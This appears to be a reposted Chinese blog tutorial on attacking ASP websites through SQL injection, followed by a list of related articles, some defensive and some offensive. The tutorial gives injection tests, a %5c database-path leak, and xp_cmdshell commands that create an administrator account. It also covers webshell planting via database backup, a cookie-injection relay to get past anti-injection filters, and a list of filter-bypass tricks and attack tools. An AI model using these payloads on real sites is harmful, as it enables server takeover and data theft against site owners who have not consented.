脚本入侵讲解-asp注入漏洞

转载 2011年01月21日 13:38:00
1:注入漏洞
------------
1.asp手工注入
第一步:
先把IE菜单=>工具=>Internet选项=>高级=>显示友好 HTTP 错误信息前面的勾去掉。
否则,不论服务器返回什么错误,IE都只显示为HTTP 500服务器错误,不能获得更多的提示信息。
http://www.hack92.com/hack92.asp?id=1
我们在这个地址后面加上单引号’ 然后and 1=1 正确 and 1=2 错误的话就说明存在注入漏洞了!
2:注入点爆库方法
先举个例子一个注入http://www.hack92.com/asp/hack92.asp?id=1
然后改成爆库http://www.hack92.com/asp%5chack92.asp?id=1
利用%5c爆数据库
3:注入点sa权拿服务器
注入点http://www.hack92.com/hack92.asp?id=1
是否存在xp_cmdshell
and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell')
--用xp_cmdshell执行命令
;exec master..xp_cmdshell"net user name password /add"--
;exec master..xp_cmdshell"net localgroup name administrators /add"--
当然我们可以直接让工具来帮我们搞定。这一类工具有啊D,Domain,NBSI,HDSI,等等
这几个工具用命令建立账号密码
4:注入点db_owner权限备份webhsell 大家可以去百度搜索db_owner权限备份文章等等 或教程
当然我们可以直接让工具来帮我们搞定。这一类工具有啊D,Domain,NBSI,HDSI,等等
列目录,找网站路径 然后数据库备份上我们的asp小马.大马或一句话。然后得到webshell
5:中转注入和突破防注入程序
我们是否可以用什么方法绕过SQL注入的限制呢
我就说下长用的cookie注入
http://www.hack92.com/hack92.asp?id=1 一个防注入的地址
我们来搭建个www先 然后打开 注入中转生成器
然后选择cookie
注入键名:写参数:id=
注入url地址写上:http://www.hack92.com/hack92.asp
来源页:写上:http://www.hack92.com/hack92.asp
post提交值写上:jmdcw=1
然后点击生成asp 目录就出现了一个jmCook.asp
把文件放在我们的搭建个www里
比如:http://127.0.0.1/jmCook.asp?jmdcw=1 然后注入

方法:
中转注入 有post cookie gel注入
1、运用编码技术绕过
2、通过空格绕过
3、运用字符串判断代替
4、通过类型转换修饰符N绕过
5、通过+号拆解字符串绕过
7、通过IN绕过
8、运用注释语句绕过
9:抓取cookies然后中转
等等!大家可以去百度搜索 工具和教程 文章
突破防注入程序
通用防注入程序都是用”sqlin.asp“这个文件名来做非法记录的数据库
分析程序源码
然后突破

ASP防止跨站脚本和SQL注入代码

使用方法如下:1. 把以下代码保存为_safe.asp,然后放到站点根目录即可。
  • xieyunc
  • xieyunc
  • 2016年07月22日 22:35
  • 4916

sql注入 js脚本注入 html入侵(自己收集的一些解决方案)欢迎指正

sql注入 js脚本注入 html入侵sql注入简介通俗的讲,SQL注入就是恶意黑客或者竞争对手利用现有的B/S或者C/S架构的系统,将恶意的SQL语句通过表单等传递给后台SQL数据库引擎执行。比如,...
  • alleged
  • alleged
  • 2017年01月12日 16:00
  • 3449

记录一次攻击事件(redis 未授权漏洞利用直接登录服务器)v

听到朋友说接到阿里云的报障,提示黑客把他的服务器当肉鸡了,当时有点怕怕,继而官方的网络带宽也爆了进而系统处于瘫痪,当时我需要帮他处理这个问题 1 在没有查到杀手之前我是先把带宽&端口用iptab...
  • whs_321
  • whs_321
  • 2016年06月22日 15:27
  • 10564

wxh Asp网站脚本漏洞的安全防范

  • 2008年09月22日 21:52
  • 46KB
  • 下载

Drupal User Karma模块跨站脚本和SQL注入漏洞.php

  • 2008年12月15日 12:13
  • 40KB
  • 下载

ASP.Net C# SQL注入 跨脚步漏洞 案例

  • 2013年07月31日 17:20
  • 357KB
  • 下载

ASP注入漏洞全接触[转自www.hacker.com.cn 黑客防线]

随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进...
  • cnLiou
  • cnLiou
  • 2013年06月15日 07:04
  • 615

千博企业网站管理系统HitCount.Asp页面注入漏洞

程序都加入了防注入代码的,在NoSql.asp文件中7kccopyd-code If EnableStopInjection = True Then Dim Fy_Post, ...
  • fengling132
  • fengling132
  • 2012年05月02日 12:07
  • 522

防网站漏洞扫描asp代码,也就是防注入的通用代码

把下面的代码保存在公用文件里就可以防止注入扫描了,比方说conn.asp 里,根据多年开发的经验建议将网站后台和前台分离,后台一个conn.asp 前台一个conn.asp 前台conn.asp加如下...
  • wkj001
  • wkj001
  • 2016年11月09日 14:29
  • 790

SQL通用防注入系统asp版 插一句话漏洞利用

今晚群里朋友叫看个站,有sql防注入,绕不过,但是有发现记录wrong的文件sqlin.asp 既然做了记录,再查看了下它的记录文件 于是想着构造个asp一句话写进去,前面...
  • god_7z1
  • god_7z1
  • 2012年08月14日 15:23
  • 1225
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:脚本入侵讲解-asp注入漏洞
举报原因:
原因补充:

(最多只允许输入30个字)